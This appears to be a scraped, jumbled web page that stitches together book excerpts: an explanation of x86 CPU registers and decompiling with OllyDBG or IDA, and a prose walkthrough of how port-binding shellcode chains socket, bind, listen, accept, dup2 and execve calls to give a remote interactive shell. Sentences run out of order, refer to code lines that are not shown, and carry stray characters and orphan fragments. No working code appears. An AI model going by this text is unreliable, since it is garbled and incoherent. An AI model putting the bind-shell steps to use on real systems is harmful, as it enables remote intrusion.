The four non-pointer, non-index general registers are usually then broken down into four divisions in a 64-bit system. When the x86-64 architecture was released, the designers needed to extend the CPU registers beyond the original register length to, you guessed again, 64 bits. Many home computers still run at 32 bits, although most are migrating to the newer, faster architecture, known as x86-64. In a 32-bit system the register length is 32 bits, as you may have already guessed. The EBP is also known as the “Frame Pointer.”
#Langy definition code
We’ll not be covering IDA in this book due to the cost of the commercial application (it does have a demo for limited evaluation, and a freeware version for windows that is a few updates behind) for the readers, but if you want a future career in reverse code engineering you will inevitably be crossing paths with IDA ( ).ĮAX-The Accumulator Register is used for operands and results data.ĮBX-Base Register is used to hold pointer to data.ĮCX-Counter Register is used in loop and string operations.ĮDX-Data Register is used as a data Input/Output register.ĮSI/EDI-Source Index and Destination Index Registers are used memory and string operations.ĮSP-Stack Pointer Register is used to point to the top of the stack (always).ĮBP-Stack Data Pointer Register is used to reference functions and stack variables in the current stack frame. What this allows us to do is to use a program like OllyDBG or IDA (Interactive Disassembler) to further translate that Assembly code into a higher level programming language such as C, C++, Objective-C, and so on. What we mean by this is that one block of machine code (10110) will directly translate to assembly code (mov).
To do that we’re going to need some background on the guts of assembly mnemonics, and how they interact with the machine code in the compiled application.Īssembly is, in most cases, a 1 to 1 instruction match from machine code.
Now that we’ve created our vulnerable test application we’re going to continue down the road a bit further, into the realm of assembly analysis and decompiling. Russ Rogers, in The Hacker's Guide to OS X, 2013 Decompiling Journey CPU Registers Because stdin, stdout, and stderr are dup’ed to the socket, everything sent to the socket will be sent to the shell, and everything written to stdin or stdout by the shell is sent to the socket.Īlijohn Ghassemlouei. Because we want to give the connected person an interactive shell, we will duplicate stdin, stdout, and stderr with the socket (lines 18 through 20), and then execute the shell (line 21). This file descriptor allows us to communicate with the socket. We therefore need to build a structure and get the pointer to it the same way we have built and obtained pointers to strings by pushing them on the stack.Īfter the accept system call is executed, we get a file descriptor to the socket. The bind system call is the most difficult because it requires a pointer to a structure. When the socket system call is executed, we have to store its return value at a safe place because that value has to be used as the argument of the bind, listen, and accept system calls.
The socket system call (line 14) is very easy because all arguments are integers. In order to bind a shell to a port, we need to execute the socket (line 14), bind(line 15), listen (line 16), accept (line 17), dup2 (lines 18 through 20), and execve (line 21) system calls successfully. Foster, Mike Price, in Sockets, Shellcode, Porting, & Coding, 2005 Analysis
0 kommentar(er)
